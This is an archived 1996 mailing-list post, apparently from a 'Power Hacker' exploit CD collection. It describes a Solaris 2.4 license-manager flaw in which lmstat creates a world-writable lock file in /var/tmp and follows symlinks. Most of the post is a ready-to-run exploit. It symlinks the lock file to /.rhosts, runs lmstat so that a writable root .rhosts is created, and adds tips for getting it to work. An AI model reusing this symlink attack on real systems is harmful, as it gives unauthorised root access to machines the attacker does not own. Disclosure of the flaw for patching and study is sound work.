home *** CD-ROM | disk | FTP | other *** search

---

/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / sol-license.txt

< prev

next >

Wrap

Text File  |  2001-11-06  |  836b  |  31 lines

---

1.  
2.                         solaris 2.4 license-manager bug
3.                                        
4.    Grant Kaufmann (gkaufman@cs.uct.ac.za)
5.    Wed, 16 Oct 1996 23:46:07 +0200
6.    
7. Another bug for solaris 2.4
8. The license manager must be running, expect both
9. lmgrd.ste & suntechd to be somewhere in your process table.
10.  
11. /var/tmp/locksuntechd will be created by anyone who runs
12. lmstat, with perms 666 and quite happy to follow symlinks.
13. Anyway, here's the exploit.
14.  
15. -+-+-+ CUT
16. rm /var/tmp/locksuntechd
17. ln -s /.rhosts /var/tmp/locksuntechd
18. lmstat -c <insert your license file name here>
19.  
20. NOTES
21. lmstat could be anywhere on your filesystem. try /etc/opt/licenses
22. I found that sometimes this didn't work first time. It didn't create
23. the file. Just run lmstat again and it'll work.
24. -+-+-+
25.  
26. --
27. Grant
28. --
29. http://www.cs.uct.ac.za/~gkaufman/pgp.html
30.  
31.